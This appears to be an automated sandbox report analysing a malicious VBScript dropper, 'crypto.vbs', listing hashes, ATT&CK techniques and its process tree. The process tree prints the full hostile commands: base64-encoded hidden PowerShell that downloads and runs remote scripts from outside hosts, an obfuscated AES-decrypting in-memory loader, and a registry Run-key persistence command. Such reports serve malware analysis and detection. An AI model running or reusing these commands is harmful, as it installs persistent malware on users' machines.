ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4

General

Target

crypto.vbs
Size

273KB
MD5

d3a2ad6fb6dab0fa9dc4372edd2e2c36
SHA1

01e30df2eed8f6945c8705e1289f1a5fb874f9ad
SHA256

ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4
SHA512

c698631d9d5c76b4e6d99a22d3057f0c030865098ab156eff7070c672230af0718dc970542cc96d31defe23ce1aa5b6ef4b42c41d2f1f60ee4ec10a54b9543a6
SSDEEP

6144:uvpZGWTfNhok1a5w8PQAb4zfn2Lhi0XmQU8o:4pEYlM5w84icSh5Xm7

Score

8^/10

discovery execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2724	powershell.exe
3036	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
3036	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2724	powershell.exe
3036	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	3036	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1104 wrote to memory of 2056	1104	WScript.exe	31
PID 1104 wrote to memory of 2056	1104	WScript.exe	31
PID 1104 wrote to memory of 2056	1104	WScript.exe	31
PID 2056 wrote to memory of 2368	2056	cmd.exe	33
PID 2056 wrote to memory of 2368	2056	cmd.exe	33
PID 2056 wrote to memory of 2368	2056	cmd.exe	33
PID 2368 wrote to memory of 2724	2368	cmd.exe	35
PID 2368 wrote to memory of 2724	2368	cmd.exe	35
PID 2368 wrote to memory of 2724	2368	cmd.exe	35
PID 2368 wrote to memory of 2628	2368	cmd.exe	36
PID 2368 wrote to memory of 2628	2368	cmd.exe	36
PID 2368 wrote to memory of 2628	2368	cmd.exe	36
PID 2368 wrote to memory of 3036	2368	cmd.exe	37
PID 2368 wrote to memory of 3036	2368	cmd.exe	37
PID 2368 wrote to memory of 3036	2368	cmd.exe	37
PID 2368 wrote to memory of 3036	2368	cmd.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\crypto.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1104
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2724
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
      4⤵
      Adds Run key to start application
      PID:2628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gcWNqeWdpZG1ma2ptc2pudmZ6ZmRhcGxwZ2p3YmJubm9kdGVyYnRoaCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3gxd0YxZndiMlhia0N0SEgyd0NaR1FnY3UyZDB2ZVFlYUNVZzJsV2RlYTg9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCc3UEo3ZkNYVnltb3F2VDFhOFdpSFRBPT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGdyeGhrZXBneXBnbmhld2JxdHJ3bGNrc3h1anpld3Rscnh3anNkZmMoJHBhcmFtX3Zhcil7CUlFWCAnJHRxY21oemh6d2RhaGNsdmRnZWtxdnFjY3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckdXZraG5qbW9vZHZheWt4bmtkYXZsaWdjcz1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGNudHBnZG56cG1ld3JpdW90b2lhZGl1bWM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkdHFjbWh6aHp3ZGFoY2x2ZGdla3F2cWNjdywgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkY250cGdkbnpwbWV3cml1b3RvaWFkaXVtYy5Db3B5VG8oJHV2a2huam1vb2R2YXlreG5rZGF2bGlnY3MpOwkkY250cGdkbnpwbWV3cml1b3RvaWFkaXVtYy5EaXNwb3NlKCk7CSR0cWNtaHpoendkYWhjbHZkZ2VrcXZxY2N3LkRpc3Bvc2UoKTsJJHV2a2huam1vb2R2YXlreG5rZGF2bGlnY3MuRGlzcG9zZSgpOwkkdXZraG5qbW9vZHZheWt4bmtkYXZsaWdjcy5Ub0FycmF5KCk7fWZ1bmN0aW9uIGRyZWt5c21ubXl6YmxxdnVscm5wa2Rjc3VyaXBtbGxtbWh4KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbG1iaGttcGlvbHdzemh6aGFpeXRxc3VmZ3N1eWNwdXNobXZxbXNmej1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG9vZHh5dnRnaXNkenZzbXNzdmFyc3FnenFkbG5sanZpZHllYnB4aGx6b3FqbXV4cHpkPSRsbWJoa21waW9sd3N6aHpoYWl5dHFzdWZnc3V5Y3B1c2htdnFtc2Z6LkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG9vZHh5dnRnaXNkenZzbXNzdmFyc3FnenFkbG5sanZpZHllYnB4aGx6b3FqbXV4cHpkLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kbnljcHNkcWZmd3VsdnJib29kdmZ4cWdjbyA9ICRlbnY6VVNFUk5BTUU7JHZramx1dmR1a2NyZnV1enhqeXRna2tjbXkgPSAnQzpcVXNlcnNcJyArICRueWNwc2RxZmZ3dWx2cmJvb2R2ZnhxZ2NvICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmtqbHV2ZHVrY3JmdXV6eGp5dGdra2NteTskYXFmenU9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCR2a2psdXZkdWtjcmZ1dXp4anl0Z2trY215KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkZnl1IGluICRhcWZ6dSkgewlpZiAoJGZ5dS5TdGFydHNXaXRoKCc6OicpKQl7CQkkbGh4bXQ9JGZ5dS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kY2lsaWJ6eXN4anFvd3ZtYmdzb2FzcmJkZXR6b21nZ3BqaWo9W3N0cmluZ1tdXSRsaHhtdC5TcGxpdCgnXCcpO0lFWCAnJGJ6ZGxrdmV6aGltbGFncWd5aXBta2doZWh6a2dxZGJmb21sPWdyeGhrZXBneXBnbmhld2JxdHJ3bGNrc3h1anpld3Rscnh3anNkZmMgKHFjanlnaWRtZmtqbXNqbnZmemZkYXBscGdqd2Jibm5vZHRlcmJ0aGggKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkY2lsaWJ6eXN4anFvd3ZtYmdzb2FzcmJkZXR6b21nZ3BqaWpbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckY2NnZGZvcnV1cml6aXZhaGh0d3l2cnpla2x4amVoZ3hudm89Z3J4aGtlcGd5cGduaGV3YnF0cndsY2tzeHVqemV3dGxyeHdqc2RmYyAocWNqeWdpZG1ma2ptc2pudmZ6ZmRhcGxwZ2p3YmJubm9kdGVyYnRoaCAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRjaWxpYnp5c3hqcW93dm1iZ3NvYXNyYmRldHpvbWdncGppalsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtkcmVreXNtbm15emJscXZ1bHJucGtkY3N1cmlwbWxsbW1oeCAkYnpkbGt2ZXpoaW1sYWdxZ3lpcG1rZ2hlaHprZ3FkYmZvbWwgJG51bGw7ZHJla3lzbW5teXpibHF2dWxybnBrZGNzdXJpcG1sbG1taHggJGNjZ2Rmb3J1dXJpeml2YWhodHd5dnJ6ZWtseGplaGd4bnZvICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
265KB

MD5
6e899645463d001464d3b7d1ffe224fa

SHA1
04d16d1d22358ec0f5100855cf7a105096c8beb3

SHA256
80226cfbbd380486029f9f2b06af35c1b7ae4efabe32eaf653ad4e846eeab7fb

SHA512
e0b29154049fcfc760d42dc31857d66a2e460c3e882cfd5341aeea8c975d3e1fb91d02744e313aa844695b8900cc821d2f8ce06afd8326df06719152072b526e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SE76N6FEWZ27YKTSR0CV.temp

Filesize
7KB

MD5
2f3b8a50d0a5daf2539ad78e690f3a43

SHA1
da3491ed681110f061e612bd9bde3d2e2e6732ac

SHA256
416309b2a666a9381ab6cd9198e656bbe5cc70cbabecc67fc6e658853e379c0e

SHA512
9764e19d57781b59eb1c67eea32b04fc54587a3de2f4f4d11293dc972730f99b743917ff158f94819ea037d645af5466352245a6918345d41943077f7982f121

Download Submit
memory/2724-13-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

Filesize
4KB

Download
memory/2724-14-0x000000001B0F0000-0x000000001B3D2000-memory.dmp

Filesize
2.9MB

Download
memory/2724-16-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/2724-15-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-17-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-19-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-18-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-20-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-21-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads